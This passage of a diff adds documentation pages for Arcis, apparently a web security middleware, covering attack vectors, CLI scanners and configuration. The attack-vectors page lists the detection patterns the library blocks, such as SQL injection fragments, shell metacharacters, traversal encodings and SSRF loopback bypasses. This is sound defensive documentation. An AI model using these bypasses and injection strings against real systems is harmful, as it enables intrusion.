+      <a href="../" class="docs-logo">Arcis<span>.</span></a>
+      <ul class="docs-nav-links">
+        <li><a href="../#how-it-works">How It Works</a></li>
+        <li><a href="../#languages">Languages</a></li>
+        <li><a href="../#threats">Threats</a></li>
+        <li><a href="../#comparison">Compare</a></li>
+        <li><a href="./" class="active">Docs</a></li>
+      </ul>
+      <div class="docs-nav-cta">
+        <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
+          <svg viewBox="0 0 16 16" fill="currentColor"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
+          Star
+          <span class="star-count" id="starCount"></span>
+        </a>
+        <a href="./getting-started.html" class="btn-primary-nav">
+          Try Arcis
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </nav>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="sidebar">
+      <h3>Overview</h3>
+      <ul>
+        <li><a href="./">Introduction</a></li>
+        <li><a href="./getting-started.html">Getting Started</a></li>
+      </ul>
+      <h3>Guides</h3>
+      <ul>
+        <li><a href="./frameworks.html">Framework Adapters</a></li>
+        <li><a href="./configuration.html">Configuration</a></li>
+        <li><a href="./attack-vectors.html" class="active">Attack Vectors</a></li>
+      </ul>
+      <h3>Reference</h3>
+      <ul>
+        <li><a href="./api-reference.html">API Reference</a></li>
+        <li><a href="./cli.html">CLI Tools</a></li>
+      </ul>
+      <h3>Resources</h3>
+      <ul>
+        <li><a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></li>
+        <li><a href="https://www.npmjs.com/package/@arcis/node" target="_blank" rel="noopener">npm package</a></li>
+        <li><a href="https://pypi.org/project/arcis/" target="_blank" rel="noopener">PyPI package</a></li>
+      </ul>
+    </aside>
+
+    <main class="docs-content">
+      <button class="sidebar-toggle" onclick="document.getElementById('sidebar').classList.toggle('mobile-open')">☰ Menu</button>
+
+      <div class="docs-breadcrumb"><a href="./">Docs</a> / Attack Vectors</div>
+      <h1>Attack Vectors</h1>
+      <p class="lead">
+        Every attack type Arcis blocks, what it is, and how the protection works. Use this as a reference when investigating a blocked request or auditing coverage.
+      </p>
+
+      <h2 id="xss">XSS (Cross-Site Scripting)</h2>
+      <p>Attackers inject malicious scripts into pages viewed by other users, stealing cookies, sessions, or defacing content.</p>
+      <p><strong>How Arcis stops it:</strong> Strips <code>&lt;script&gt;</code>, <code>javascript:</code>, event handlers (<code>onclick=</code>), <code>&lt;iframe&gt;</code>, <code>&lt;object&gt;</code>, <code>&lt;embed&gt;</code>, SVG <code>onload</code>, and HTML injection vectors (<code>&lt;form&gt;</code>, <code>&lt;meta&gt;</code>, <code>&lt;base&gt;</code>, <code>&lt;link&gt;</code>). Then HTML-encodes remaining special characters.</p>
+
+      <h2 id="sql">SQL Injection</h2>
+      <p>Attackers inject SQL syntax into inputs to read, modify, or destroy database data.</p>
+      <p><strong>How Arcis stops it:</strong> Detects SQL keywords (<code>SELECT</code>, <code>UNION</code>, <code>DROP</code>), comment syntax (<code>--</code>, <code>/*</code>), boolean logic (<code>OR 1=1</code>), and time-based blind attacks (<code>SLEEP</code>, <code>BENCHMARK</code>, <code>pg_sleep</code>, <code>WAITFOR DELAY</code>). Replaces detected patterns with <code>[BLOCKED]</code>.</p>
+      <div class="callout warning">
+        <p><strong>Defense-in-depth only.</strong> Arcis is not a replacement for parameterized queries. Always use an ORM or prepared statements as your primary defense.</p>
+      </div>
+
+      <h2 id="nosql">NoSQL Injection</h2>
+      <p>Attackers pass MongoDB operators in JSON bodies to bypass authentication or query logic.</p>
+      <p><strong>How Arcis stops it:</strong> Blocks 35 dangerous MongoDB operators including <code>$gt</code>, <code>$where</code>, <code>$regex</code>, <code>$function</code>, <code>$accumulator</code>, <code>$expr</code>, and aggregation pipeline operators. Dangerous keys are stripped from objects recursively (case-insensitive).</p>
+
+      <h2 id="command">Command Injection</h2>
+      <p>Attackers inject shell commands into inputs that get passed to <code>exec()</code>, <code>spawn</code>, or similar.</p>
+      <p><strong>How Arcis stops it:</strong> Strips shell metacharacters (<code>;</code>, <code>&amp;</code>, <code>|</code>, backtick, <code>$()</code>), URL-encoded control characters (<code>%00</code> to <code>%1F</code>), and output redirection (<code>&gt;&gt;</code>, <code>&lt;&lt;</code>).</p>
+
+      <h2 id="path">Path Traversal</h2>
+      <p>Attackers use <code>../</code> to access files outside the intended directory.</p>
+      <p><strong>How Arcis stops it:</strong> Strips <code>../</code>, <code>..\\</code>, URL-encoded variants (<code>%2e%2e</code>), and double-encoded sequences (<code>%252e</code>). Unicode-normalizes input first (NFKC) to catch fullwidth-dot bypasses. Loops until stable to catch nested sequences like <code>....//</code>.</p>
+
+      <h2 id="ssrf">SSRF (Server-Side Request Forgery)</h2>
+      <p>Attackers trick the server into making requests to internal services or cloud metadata endpoints.</p>
+      <p><strong>How Arcis stops it:</strong> <code>validateUrl()</code> blocks private IPs (10.x, 172.16-31.x, 192.168.x), loopback (127.x, ::1), link-local (169.254.0.0/16 — includes AWS/GCP/Azure metadata), cloud metadata hostnames, and IP-encoding bypasses: decimal (<code>2130706433</code>), octal (<code>0177.0.0.1</code>), hex (<code>0x7f000001</code>), IPv6-mapped (<code>::ffff:127.0.0.1</code>).</p>
+
+      <h2 id="csrf">CSRF (Cross-Site Request Forgery)</h2>
+      <p>Attackers trick logged-in users into submitting forms to your site from a malicious page.</p>
+      <p><strong>How Arcis stops it:</strong> <code>csrfProtection()</code> issues a double-submit cookie with HMAC. Token validation uses constant-time comparison to prevent timing attacks. Optionally enforces <code>__Host-</code> cookie prefix for maximum security.</p>
+
+      <h2 id="ssti">SSTI (Server-Side Template Injection)</h2>
+      <p>Attackers inject template syntax that gets evaluated server-side (Jinja2, Twig, ERB, etc.).</p>
+      <p><strong>How Arcis stops it:</strong> Detects and strips Jinja2 (<code>{{ }}</code>), Twig, Freemarker (<code>${ }</code>), ERB / EJS (<code>&lt;% %&gt;</code>), Pug (<code>#{ }</code>), and Python dunder chains (<code>__class__</code>, <code>__mro__</code>, <code>__globals__</code>).</p>
+
+      <h2 id="xxe">XXE (XML External Entity)</h2>
+      <p>Attackers inject malicious XML entities to read local files or make SSRF requests.</p>
+      <p><strong>How Arcis stops it:</strong> Strips <code>&lt;!DOCTYPE&gt;</code>, <code>&lt;!ENTITY&gt;</code>, <code>SYSTEM</code>/<code>PUBLIC</code> references, <code>&lt;![CDATA[]]&gt;</code> sections, and parameter entity syntax.</p>
+
+      <h2 id="ldap">LDAP Injection</h2>
+      <p>Attackers inject LDAP filter syntax to bypass authentication or read directory data.</p>
+      <p><strong>How Arcis stops it:</strong> <code>sanitizeLdap()</code> escapes filter operators (<code>*</code>, <code>(</code>, <code>)</code>, <code>\\</code>, null byte) in search filters. <code>sanitizeLdapDn()</code> escapes DN special characters (<code>\\</code>, <code>#</code>, <code>+</code>, <code>&lt;</code>, <code>&gt;</code>, <code>;</code>, <code>"</code>).</p>
+
+      <h2 id="jsonp">JSONP Injection</h2>
+      <p>Attackers inject malicious JavaScript into JSONP callback names.</p>
+      <p><strong>How Arcis stops it:</strong> <code>sanitizeJsonpCallback()</code> allows only safe identifier characters. Any payload with brackets, dots, or special characters beyond dotted identifiers is rejected.</p>
+
+      <h2 id="prototype">Prototype Pollution</h2>
+      <p>Attackers inject <code>__proto__</code>, <code>constructor</code>, or <code>prototype</code> keys into JSON bodies to poison JavaScript object prototypes.</p>
+      <p><strong>How Arcis stops it:</strong> Recursively strips 7 dangerous keys (case-insensitive): <code>__proto__</code>, <code>constructor</code>, <code>prototype</code>, <code>__defineGetter__</code>, <code>__defineSetter__</code>, <code>__lookupGetter__</code>, <code>__lookupSetter__</code>.</p>
+
+      <h2 id="rate-limit">Rate Limiting</h2>
+      <p>Attackers flood endpoints for brute force, scraping, or denial of service.</p>
+      <p><strong>How Arcis stops it:</strong> Three algorithms available: fixed window (simple), sliding window (smooth), token bucket (burst-tolerant). Per-IP isolation. Pluggable storage: in-memory default, Redis for multi-instance deployments. Fails open on infrastructure errors.</p>
+
+      <h2 id="bot">Bot Detection</h2>
+      <p>Scrapers, crawlers, and scanner bots probe for vulnerabilities or scrape content.</p>
+      <p><strong>How Arcis stops it:</strong> 80+ patterns across 7 categories (crawlers, scrapers, AI bots, CLI tools, etc.). Behavioral fingerprinting on top of user-agent matching.</p>
+
+      <h2 id="headers">Security Headers</h2>
+      <p>Response headers instruct browsers to enforce additional security policies.</p>
+      <p><strong>How Arcis stops it:</strong> Sets 16 security headers on every response, including <code>Content-Security-Policy</code>, <code>Strict-Transport-Security</code>, <code>X-Frame-Options: DENY</code>, <code>X-Content-Type-Options: nosniff</code>, <code>Referrer-Policy</code>, <code>Cross-Origin-Opener-Policy</code>, <code>Cross-Origin-Resource-Policy</code>, <code>Cross-Origin-Embedder-Policy</code>, <code>Origin-Agent-Cluster</code>.</p>
+
+      <h2 id="open-redirect">Open Redirect</h2>
+      <p>Attackers use your redirect endpoints to send users to phishing sites from your domain.</p>
+      <p><strong>How Arcis stops it:</strong> <code>validateRedirect()</code> allows only relative paths or whitelisted hostnames. Blocks absolute URLs, <code>javascript:</code>, protocol-relative (<code>//evil.com</code>), and backslash bypasses.</p>
+
+      <h2 id="error-leak">Error Leakage</h2>
+      <p>Uncaught errors expose stack traces, database connection strings, file paths, and internal IPs.</p>
+      <p><strong>How Arcis stops it:</strong> Error handler scrubs sensitive info from production responses: stack traces, DB errors, connection strings, internal IPs, framework internals, environment variable values.</p>
+
+      <h2 id="header-injection">HTTP Header Injection</h2>
+      <p>Attackers inject CRLF into header values to split responses or inject fake headers.</p>
+      <p><strong>How Arcis stops it:</strong> <code>sanitizeHeaderValue()</code> strips CRLF (<code>\r\n</code>), bare CR, bare LF, and null bytes from any string written to response headers.</p>
+
+      <h2 id="hpp">HPP (HTTP Parameter Pollution)</h2>
+      <p>Attackers send duplicate query/body parameters to bypass validation (<code>?role=user&amp;role=admin</code>).</p>
+      <p><strong>How Arcis stops it:</strong> Normalizes duplicates using last-value-wins. Original multi-value array preserved in <code>req.queryPolluted</code> for auditing. Per-parameter whitelist supported.</p>
+
+      <div class="docs-pagination">
+        <a href="./configuration.html" class="prev">
+          <span class="nav-label">← Previous</span>
+          <span class="nav-title">Configuration</span>
+        </a>
+        <a href="./api-reference.html" class="next">
+          <span class="nav-label">Next →</span>
+          <span class="nav-title">API Reference</span>
+        </a>
+      </div>
+    </main>
+  </div>
+
+  <footer class="docs-footer">
+    <div>© 2026 Arcis. MIT Licensed.</div>
+    <div><a href="../">Home</a> · <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></div>
+  </footer>
+
+  <script>
+    fetch('https://api.github.com/repos/Gagancm/arcis')
+      .then(r => r.json())
+      .then(d => { if (d.stargazers_count !== undefined) { const el = document.getElementById('starCount'); if (el) el.textContent = d.stargazers_count; } })
+      .catch(() => {});
+  </script>
+</body>
+</html>

--- a/website/documentation/cli.html
+++ b/website/documentation/cli.html
@@ -1,0 +1,231 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+  <title>CLI Tools · Arcis Docs</title>
+  <meta name="description" content="Arcis CLI tools for scanning your code and dependencies. arcis sca, arcis scan, arcis audit.">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=EB+Garamond:ital,wght@0,400;0,500;0,600;0,700;1,400&family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="docs.css">
+</head>
+<body>
+
+  <nav class="docs-nav" id="nav">
+    <div class="docs-nav-inner">
+      <a href="../" class="docs-logo">Arcis<span>.</span></a>
+      <ul class="docs-nav-links">
+        <li><a href="../#how-it-works">How It Works</a></li>
+        <li><a href="../#languages">Languages</a></li>
+        <li><a href="../#threats">Threats</a></li>
+        <li><a href="../#comparison">Compare</a></li>
+        <li><a href="./" class="active">Docs</a></li>
+      </ul>
+      <div class="docs-nav-cta">
+        <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
+          <svg viewBox="0 0 16 16" fill="currentColor"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
+          Star
+          <span class="star-count" id="starCount"></span>
+        </a>
+        <a href="./getting-started.html" class="btn-primary-nav">
+          Try Arcis
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </nav>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="sidebar">
+      <h3>Overview</h3>
+      <ul>
+        <li><a href="./">Introduction</a></li>
+        <li><a href="./getting-started.html">Getting Started</a></li>
+      </ul>
+      <h3>Guides</h3>
+      <ul>
+        <li><a href="./frameworks.html">Framework Adapters</a></li>
+        <li><a href="./configuration.html">Configuration</a></li>
+        <li><a href="./attack-vectors.html">Attack Vectors</a></li>
+      </ul>
+      <h3>Reference</h3>
+      <ul>
+        <li><a href="./api-reference.html">API Reference</a></li>
+        <li><a href="./cli.html" class="active">CLI Tools</a></li>
+      </ul>
+      <h3>Resources</h3>
+      <ul>
+        <li><a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></li>
+        <li><a href="https://www.npmjs.com/package/@arcis/node" target="_blank" rel="noopener">npm package</a></li>
+        <li><a href="https://pypi.org/project/arcis/" target="_blank" rel="noopener">PyPI package</a></li>
+      </ul>
+    </aside>
+
+    <main class="docs-content">
+      <button class="sidebar-toggle" onclick="document.getElementById('sidebar').classList.toggle('mobile-open')">☰ Menu</button>
+
+      <div class="docs-breadcrumb"><a href="./">Docs</a> / CLI Tools</div>
+      <h1>CLI Tools</h1>
+      <p class="lead">
+        Arcis ships with three command-line tools that scan your codebase and dependencies for security issues. All are offline, CI-friendly, and ship with the Python package.
+      </p>
+
+      <h2 id="install">Installation</h2>
+      <p>The CLI is included in the Python package:</p>
+<pre><code>pip install arcis
+
+<span class="c"># Verify</span>
+arcis --version</code></pre>
+
+      <h2 id="sca">arcis sca — Supply Chain Attack Scanner</h2>
+      <p>Detects compromised packages from known supply chain attacks. Scans your project's lockfiles, <code>node_modules</code>, and Python environments for malicious versions and backdoor artifacts.</p>
+
+      <h3>Usage</h3>
+<pre><code><span class="c"># Scan current directory</span>
+arcis sca
+
+<span class="c"># Scan a specific path</span>
+arcis sca /path/to/project
+
+<span class="c"># Also check globally installed packages and .pth backdoors</span>
+arcis sca --system
+
+<span class="c"># List all threats in the database</span>
+arcis sca --list-threats</code></pre>
+
+      <h3>What it checks</h3>
+      <ul>
+        <li><code>package-lock.json</code> (v1 and v3), <code>yarn.lock</code></li>
+        <li><code>node_modules/</code> on disk</li>
+        <li><code>requirements.txt</code>, <code>Pipfile.lock</code>, <code>poetry.lock</code></li>
+        <li>Currently installed pip packages (<code>--system</code>)</li>
+        <li>Python <code>site-packages</code> for suspicious <code>.pth</code> backdoor files (<code>--system</code>)</li>
+      </ul>
+
+      <h3>Currently detects</h3>
+      <table>
+        <thead><tr><th>Attack</th><th>Versions</th><th>Vector</th></tr></thead>
+        <tbody>
+          <tr>
+            <td><strong>axios (npm)</strong> — March 2026</td>
+            <td>1.14.1, 0.30.4</td>
+            <td>Trojanized dependency deploys a RAT via postinstall</td>
+          </tr>
+          <tr>
+            <td><strong>litellm (PyPI)</strong> — March 2026</td>
+            <td>1.82.7, 1.82.8</td>
+            <td>Credential harvester with persistent <code>.pth</code> backdoor</td>
+          </tr>
+        </tbody>
+      </table>
+
+      <h3>Exit codes</h3>
+      <ul>
+        <li><strong>0</strong> — no compromised packages found</li>
+        <li><strong>1</strong> — compromised package detected</li>
+      </ul>
+
+      <div class="callout note">
+        <p><strong>Offline by design.</strong> No network calls, no telemetry. The threat database is bundled with the package. Every detection is auditable in <code>arcis/data/threat-db.json</code>.</p>
+      </div>
+
+      <h2 id="audit">arcis audit — Static Analysis</h2>
+      <p>Scans your source code for dangerous patterns: unsafe functions, weak crypto, user-controlled paths, unsafe deserializers.</p>
+
+      <h3>Usage</h3>
+<pre><code><span class="c"># Audit a project</span>
+arcis audit /path/to/project
+
+<span class="c"># Filter by language</span>
+arcis audit /path/to/project --language python
+
+<span class="c"># Filter by severity</span>
+arcis audit /path/to/project --severity high
+
+<span class="c"># Output as JSON for CI</span>
+arcis audit /path/to/project --format json</code></pre>
+
+      <h3>Supported languages</h3>
+      <ul>
+        <li>Python</li>
+        <li>JavaScript</li>
+        <li>TypeScript</li>
+      </ul>
+
+      <h3>Detection rules (14 total)</h3>
+      <table>
+        <thead><tr><th>Rule</th><th>What it flags</th></tr></thead>
+        <tbody>
+          <tr><td><code>EVAL</code></td><td><code>eval()</code>, <code>exec()</code>, <code>Function()</code></td></tr>
+          <tr><td><code>UNSAFE-DESERIALIZE</code></td><td><code>pickle.loads()</code>, <code>yaml.load()</code> without SafeLoader</td></tr>
+          <tr><td><code>INNERHTML</code></td><td><code>.innerHTML</code>, <code>document.write()</code>, <code>bypassSecurityTrust*()</code></td></tr>
+          <tr><td><code>SQL-CONCAT</code></td><td>String concatenation in SQL queries</td></tr>
+          <tr><td><code>ORM-RAW</code></td><td>Raw queries with user input</td></tr>
+          <tr><td><code>FS-USER-PATH</code></td><td>File system operations with user-controlled paths</td></tr>
+          <tr><td><code>FETCH-USER-URL</code></td><td>HTTP fetch with user-controlled URLs (SSRF)</td></tr>
+          <tr><td><code>WEAK-CRYPTO</code></td><td>MD5, SHA1 for security purposes</td></tr>
+          <tr><td><code>HARDCODED-SECRET</code></td><td>Potential secrets in source</td></tr>
+          <tr><td><code>JWT-NO-ALGO</code></td><td>JWT verification without algorithm check</td></tr>
+        </tbody>
+      </table>
+
+      <h2 id="scan">arcis scan — Vulnerability Scanner</h2>
+      <p>Sends live attack payloads to your running application and reports which ones get through.</p>
+
+      <h3>Usage</h3>
+<pre><code><span class="c"># Scan a local app</span>
+arcis scan http://localhost:3000
+
+<span class="c"># Scan with auth</span>
+arcis scan http://localhost:3000 --header <span class="s">"Authorization: Bearer ..."</span>
+
+<span class="c"># Only XSS and SQL tests</span>
+arcis scan http://localhost:3000 --only xss,sql</code></pre>
+
+      <div class="callout warning">
+        <p><strong>Only scan your own applications.</strong> Running <code>arcis scan</code> against systems you don't own is illegal in most jurisdictions.</p>
+      </div>
+
+      <h2 id="ci">Using in CI/CD</h2>
+      <p>Arcis CLI tools return exit code 1 on findings, making them easy to add to CI pipelines.</p>
+<pre><code><span class="c"># .github/workflows/security.yml</span>
+- name: Check for compromised dependencies
+  run: arcis sca .
+
+- name: Static security audit
+  run: arcis audit . --severity high</code></pre>
+
+      <div class="docs-pagination">
+        <a href="./api-reference.html" class="prev">
+          <span class="nav-label">← Previous</span>
+          <span class="nav-title">API Reference</span>
+        </a>
+        <a href="./" class="next">
+          <span class="nav-label">Next →</span>
+          <span class="nav-title">Docs Home</span>
+        </a>
+      </div>
+    </main>
+  </div>
+
+  <footer class="docs-footer">
+    <div>© 2026 Arcis. MIT Licensed.</div>
+    <div><a href="../">Home</a> · <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></div>
+  </footer>
+
+  <script>
+    fetch('https://api.github.com/repos/Gagancm/arcis')
+      .then(r => r.json())
+      .then(d => { if (d.stargazers_count !== undefined) { const el = document.getElementById('starCount'); if (el) el.textContent = d.stargazers_count; } })
+      .catch(() => {});
+  </script>
+</body>
+</html>

--- a/website/documentation/configuration.html
+++ b/website/documentation/configuration.html
@@ -1,0 +1,209 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+  <title>Configuration · Arcis Docs</title>
+  <meta name="description" content="Configure Arcis sanitizers, rate limiters, headers, and CORS.">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=EB+Garamond:ital,wght@0,400;0,500;0,600;0,700;1,400&family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="docs.css">
+</head>
+<body>
+
+  <nav class="docs-nav" id="nav">
+    <div class="docs-nav-inner">
+      <a href="../" class="docs-logo">Arcis<span>.</span></a>
+      <ul class="docs-nav-links">
+        <li><a href="../#how-it-works">How It Works</a></li>
+        <li><a href="../#languages">Languages</a></li>
+        <li><a href="../#threats">Threats</a></li>
+        <li><a href="../#comparison">Compare</a></li>
+        <li><a href="./" class="active">Docs</a></li>
+      </ul>
+      <div class="docs-nav-cta">
+        <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
+          <svg viewBox="0 0 16 16" fill="currentColor"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
+          Star
+          <span class="star-count" id="starCount"></span>
+        </a>
+        <a href="./getting-started.html" class="btn-primary-nav">
+          Try Arcis
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </nav>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="sidebar">
+      <h3>Overview</h3>
+      <ul>
+        <li><a href="./">Introduction</a></li>
+        <li><a href="./getting-started.html">Getting Started</a></li>
+      </ul>
+      <h3>Guides</h3>
+      <ul>
+        <li><a href="./frameworks.html">Framework Adapters</a></li>
+        <li><a href="./configuration.html" class="active">Configuration</a></li>
+        <li><a href="./attack-vectors.html">Attack Vectors</a></li>
+      </ul>
+      <h3>Reference</h3>
+      <ul>
+        <li><a href="./api-reference.html">API Reference</a></li>
+        <li><a href="./cli.html">CLI Tools</a></li>
+      </ul>
+      <h3>Resources</h3>
+      <ul>
+        <li><a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></li>
+        <li><a href="https://www.npmjs.com/package/@arcis/node" target="_blank" rel="noopener">npm package</a></li>
+        <li><a href="https://pypi.org/project/arcis/" target="_blank" rel="noopener">PyPI package</a></li>
+      </ul>
+    </aside>
+
+    <main class="docs-content">
+      <button class="sidebar-toggle" onclick="document.getElementById('sidebar').classList.toggle('mobile-open')">☰ Menu</button>
+
+      <div class="docs-breadcrumb"><a href="./">Docs</a> / Configuration</div>
+      <h1>Configuration</h1>
+      <p class="lead">
+        Arcis works out of the box with secure defaults. Every option is tunable when you need it. You only opt out of protection, never in.
+      </p>
+
+      <h2 id="passing-config">Passing config</h2>
+      <p>All configuration goes through a single options object passed to <code>arcis()</code>:</p>
+<pre><code>app.<span class="f">use</span><span class="p">(</span><span class="f">arcis</span><span class="p">({</span>
+  sanitize<span class="p">:</span> <span class="k">true</span><span class="p">,</span>
+  sanitizeXss<span class="p">:</span> <span class="k">true</span><span class="p">,</span>
+  rateLimit<span class="p">:</span> <span class="k">true</span><span class="p">,</span>
+  rateLimitMax<span class="p">:</span> <span class="n">100</span><span class="p">,</span>
+  rateLimitWindow<span class="p">:</span> <span class="n">60000</span><span class="p">,</span>  <span class="c">// ms</span>
+  headers<span class="p">:</span> <span class="k">true</span><span class="p">,</span>
+  isDev<span class="p">:</span> process.env.NODE_ENV === <span class="s">'development'</span><span class="p">,</span>
+<span class="p">}));</span></code></pre>
+
+      <h2 id="sanitization">Sanitization options</h2>
+      <table>
+        <thead>
+          <tr><th>Option</th><th>Default</th><th>Description</th></tr>
+        </thead>
+        <tbody>
+          <tr><td><code>sanitize</code></td><td>true</td><td>Master switch. Disables all sanitization if false.</td></tr>
+          <tr><td><code>sanitizeXss</code></td><td>true</td><td>Strip XSS patterns and HTML-encode output.</td></tr>
+          <tr><td><code>sanitizeSql</code></td><td>true</td><td>Strip SQL injection patterns.</td></tr>
+          <tr><td><code>sanitizeNoSql</code></td><td>true</td><td>Block 35 MongoDB operators ($gt, $where, etc.).</td></tr>
+          <tr><td><code>sanitizePath</code></td><td>true</td><td>Strip path traversal (../, %2e%2e, etc.).</td></tr>
+          <tr><td><code>sanitizeCmd</code></td><td>true</td><td>Strip command injection patterns.</td></tr>
+          <tr><td><code>sanitizeSsti</code></td><td>true</td><td>Strip SSTI patterns (Jinja2, Twig, ERB, Pug).</td></tr>
+          <tr><td><code>sanitizeXxe</code></td><td>true</td><td>Strip XXE patterns from XML input.</td></tr>
+          <tr><td><code>maxInputSize</code></td><td>1_000_000</td><td>Max input size in bytes. Inputs over this are truncated.</td></tr>
+        </tbody>
+      </table>
+
+      <h2 id="rate-limiting">Rate limiting</h2>
+      <table>
+        <thead>
+          <tr><th>Option</th><th>Default</th><th>Description</th></tr>
+        </thead>
+        <tbody>
+          <tr><td><code>rateLimit</code></td><td>true</td><td>Enable rate limiting.</td></tr>
+          <tr><td><code>rateLimitMax</code></td><td>100</td><td>Max requests per window.</td></tr>
+          <tr><td><code>rateLimitWindow</code></td><td>60000</td><td>Window in milliseconds.</td></tr>
+          <tr><td><code>rateLimitStore</code></td><td>memory</td><td>Storage: memory, Redis, or custom.</td></tr>
+          <tr><td><code>rateLimitSkip</code></td><td>—</td><td>Function <code>(req) =&gt; boolean</code>. Return true to skip rate limiting.</td></tr>
+        </tbody>
+      </table>
+
+      <h3>Using Redis</h3>
+<pre><code><span class="k">import</span> <span class="p">{</span> arcis<span class="p">,</span> RedisStore <span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+<span class="k">import</span> <span class="p">{</span> createClient <span class="p">}</span> <span class="k">from</span> <span class="s">'redis'</span><span class="p">;</span>
+
+<span class="k">const</span> redis = <span class="f">createClient</span><span class="p">();</span>
+<span class="k">await</span> redis.<span class="f">connect</span><span class="p">();</span>
+
+app.<span class="f">use</span><span class="p">(</span><span class="f">arcis</span><span class="p">({</span>
+  rateLimitStore<span class="p">:</span> <span class="k">new</span> <span class="f">RedisStore</span><span class="p">({</span> client<span class="p">:</span> redis <span class="p">}),</span>
+<span class="p">}));</span></code></pre>
+
+      <h2 id="security-headers">Security headers</h2>
+      <table>
+        <thead>
+          <tr><th>Option</th><th>Default</th></tr>
+        </thead>
+        <tbody>
+          <tr><td><code>headers</code></td><td>true</td></tr>
+          <tr><td><code>csp</code></td><td>strict policy (see below)</td></tr>
+          <tr><td><code>frameOptions</code></td><td>DENY</td></tr>
+          <tr><td><code>hstsMaxAge</code></td><td>31536000 (1 year)</td></tr>
+          <tr><td><code>hstsSubdomains</code></td><td>true</td></tr>
+          <tr><td><code>referrerPolicy</code></td><td>strict-origin-when-cross-origin</td></tr>
+          <tr><td><code>crossOriginOpenerPolicy</code></td><td>same-origin</td></tr>
+          <tr><td><code>crossOriginResourcePolicy</code></td><td>same-origin</td></tr>
+          <tr><td><code>crossOriginEmbedderPolicy</code></td><td>require-corp</td></tr>
+        </tbody>
+      </table>
+
+      <p>Default CSP:</p>
+<pre><code>default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';
+img-src 'self' data: https:; font-src 'self'; object-src 'none';
+frame-ancestors 'none';</code></pre>
+
+      <h2 id="cors">CORS</h2>
+      <p><code>corsProtection()</code> is opt-in middleware. Pass allowed origins explicitly:</p>
+<pre><code><span class="k">import</span> <span class="p">{</span> corsProtection <span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+
+app.<span class="f">use</span><span class="p">(</span><span class="f">corsProtection</span><span class="p">({</span>
+  origin<span class="p">:</span> <span class="p">[</span><span class="s">'https://yourapp.com'</span><span class="p">,</span> <span class="s">'https://admin.yourapp.com'</span><span class="p">],</span>
+  methods<span class="p">:</span> <span class="p">[</span><span class="s">'GET'</span><span class="p">,</span> <span class="s">'POST'</span><span class="p">],</span>
+  credentials<span class="p">:</span> <span class="k">true</span><span class="p">,</span>
+<span class="p">}));</span></code></pre>
+
+      <h2 id="csrf">CSRF</h2>
